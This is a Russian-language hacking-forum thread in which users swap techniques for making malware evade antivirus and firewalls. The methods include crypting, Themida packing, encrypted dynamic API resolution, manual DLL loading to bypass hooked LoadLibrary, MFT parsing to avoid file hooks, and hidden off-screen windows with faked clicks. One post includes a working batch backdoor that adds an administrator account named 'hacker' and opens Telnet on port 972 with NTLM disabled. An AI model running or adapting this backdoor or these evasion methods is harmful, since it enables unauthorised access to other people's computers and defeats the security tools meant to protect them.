|
Способы сокрытия от антивирусов
| |
| Волк-1024 | Дата: Пятница, 30.12.2011, 01:05 | Сообщение # 26 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Вроде. Замусоривание кода уже сейчас не канает. АВ строит логику приложения и если там очень много бесполезных прыжков и тому подобное. Она может наоборот насторожиться. Хотя могу тоже ошибаться. )
Лучше использовать комбинацию: Фейковые API + Динамич. получение функций + их шифрование.
---------------------------------------
Ой, фигню сморозил. Шифрование и дин. получ. функ несовместимы. Совместимы если только искать по имени функции, а не по хэшу.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Пятница, 30.12.2011, 01:12 |
| |
| |
| Android | Дата: Понедельник, 02.01.2012, 14:29 | Сообщение # 27 |
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| Ребята, а вы точно на Делфи пишете??? Может кто-то из вас смотрел в сторону KOL - довольно маленькие прогарммки получаются и кстати, стем же набором функций что и VCL палятся значительно меньше почему-то...
|
| |
| |
| dolphin | Дата: Понедельник, 02.01.2012, 17:37 | Сообщение # 28 |
Администратор
Сообщений: 906
Статус: Offline
| Так кол это же объектная библиотека а вирусам это зачем? Если только как альтернатива vcl. В троянце например ,если нужна визуалка, можно и на апи написать, в этом сложного особо нет. Так что  . А не палится потому что мало используют для вирусных целей.
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
Сообщение отредактировал dolphin - Понедельник, 02.01.2012, 18:29 |
| |
| |
| phl | Дата: Среда, 04.01.2012, 04:24 | Сообщение # 29 |
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
| А у меня вопрос насчёт криптора, проводил я недавно эксперимент,для него использовал антивирусник drweb, вот код батника открывающего телнет на 972 порту:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Антивирусник сразу видит в нём вирус bat.Adduser.43, далее преобразую файл из bat в exe, с помощью программы bat to exe converter и криптую, всё
если проверить файл антивирусником вирус не определяется, думал отлично, но стоит запустить файл и он тут же блокируется и опять выдаёт вирус bat.Adduser.43, хотел бы узнать в чём здесь причина и реально ли это обойти
криптор и вирус во вложении
|
| |
| |
| phl | Дата: Воскресенье, 08.01.2012, 01:32 | Сообщение # 30 |
|
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
| а уже сам понял, антивирус само добавление нового пользователя в систему с админскими правами и открытие порта воспринимает как подозрительное действие, другой вирус криптовал, норм, не палится
|
| |
| |
| Волк-1024 | Дата: Вторник, 10.01.2012, 23:57 | Сообщение # 31 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Крипт не поможет. Ибо прога не конвертирует из bat в exe, а просто суёт bat в ресурсы exe файла. И при запуске извлекает и запускает его. 80% того, что bat файл после запуска можно обнаружить в темповой папке (если в бат не самоудалиться). Я не знаю как в bat to exe converter, но в Quick Batch File Compiler так всё и происходит. (((
P.S. лучше батник зашифровать, чем экзешник.
Pascal, C\C++, Assembler, Python
|
| |
| |
| kalinochkind | Дата: Среда, 11.01.2012, 19:22 | Сообщение # 32 |
Новичок
Зарегистрирован: 12.12.2011
Группа: Пользователи
Сообщений: 3
Статус: Offline
| Можно пробовать Themidу...
|
| |
| |
| XSPY | Дата: Среда, 11.01.2012, 19:57 | Сообщение # 33 |
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| если много подозрительных мест,то это не насторожит антивири,у которых нет "оценки опасности" программы.Хотя тогда у них юзаеться нечто другое.Например,в Авире проверяються состояния флагов и т.п,импорт,секии данных и прочее....
а вообще,стоить нуно и криптовать приложение так,как нравиться аверу.
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| phl | Дата: Воскресенье, 29.01.2012, 21:59 | Сообщение # 34 |
|
Был не раз
Зарегистрирован: 28.08.2010
Группа: Пользователи
Сообщений: 20
Статус: Offline
| от антивирусов то как-нибудь можно спрятаться,но как обойти файрвол?
|
| |
| |
| Волк-1024 | Дата: Воскресенье, 29.01.2012, 22:51 | Сообщение # 35 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Для каждего фаера свои методы...
Pascal, C\C++, Assembler, Python
|
| |
| |
| vvova15 | Дата: Понедельник, 30.01.2012, 17:17 | Сообщение # 36 |
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| есть еще метод сырой загрузки dll.
суть заключается в том , чтобы вручную загрузить dll в адресное пространство, открыв длл-ку как бинарный файл, считав из pe-заголовка сколько нужно памяти, выделить ее,, загрузить туда заголовки и секции(простым компированием памяти), обработать релоки, распарсить таблицу импорта, найти в ней адрес нужной функции, и т.д.
в общем написать свои аналоги loadlibrary и getprocadress
ведь авири хукают loadlibrary из kernel32.dll и мы тем самым обойдем это и вызовем функцию незаметно для авиря.
проверял на vt - палева вообще 0
да и врятли такое будет палиться, хотя если только если ав будут хукать createfile после этого и если это длл-ка, то орать.
но мы тогда сделаем чтение файла через ioctl запросы к диску и парсинг mft(master file table) 
вот статейка, кому интересно http://slesh.name/?act=articles&subact=show&nid=12
ICQ 185-398
Сообщение отредактировал vvova15 - Понедельник, 30.01.2012, 17:18 |
| |
| |
| vvova15 | Дата: Вторник, 31.01.2012, 10:19 | Сообщение # 37 |
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| да и еще метод:
создать окно за пределами экрана, кнопку на нем , написать обработчик, чтоб по клику на нее делалось палевное действие, и посылать сообщение о кликепо этой кнопке.
ведь авири наиболее подозрительно относятся к программам "без окон без дверей", которые работают не спрашивая юзера ни о чем. а так как бэ все честно, юзер сам кликнул по кнопке и авири пока не палят этот метод.
+ кончено же обфускация))(открытие несуществующих файлов между строками нужного кода, проверка невыполнимых условий, высов функций, которые что-то там делают полезное и т.д. )
ICQ 185-398
Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 10:19 |
| |
| |
| Волк-1024 | Дата: Вторник, 31.01.2012, 14:52 | Сообщение # 38 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Quote создать окно за пределами экрана,
А не лучше ли так: Code Form1.Visible:=false;
И выйдет зверь размером в over 400кб 
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Вторник, 31.01.2012, 14:59 |
| |
| |
| vvova15 | Дата: Вторник, 31.01.2012, 16:29 | Сообщение # 39 |
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| Quote Form1.Visible:=false;
нет. http://msdn.microsoft.com/en-us/library/windows/desktop/ms632679 (v=vs.85).aspx
создаешь и регистрируешь класс окна, создаешь окно и описываешь цикл обработки сообщений
x и y в параметрах указываешь отриуательные или over 9000
ICQ 185-398
Сообщение отредактировал vvova15 - Вторник, 31.01.2012, 16:30 |
| |
| |
| xXxSh@dowxXx | Дата: Понедельник, 06.02.2012, 17:01 | Сообщение # 40 |
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| Quote (Волк-1024) Form1.Visible:=false;
...да согласен с "vvova15",ведь форма все равно остается видимой даже если Вы выставляете значение Visible:=false;
|
| |
| |
| Волк-1024 | Дата: Понедельник, 06.02.2012, 17:25 | Сообщение # 41 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| xXxSh@dowxXx Ну или так Code CreateWindowEx(0, PChar('Win'), PChar('WinMin'), 0, X, Y, Width, Height, 0, 0, Hinstance, nil);
Окно будет формально создано.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Понедельник, 06.02.2012, 17:37 |
| |
| |
|
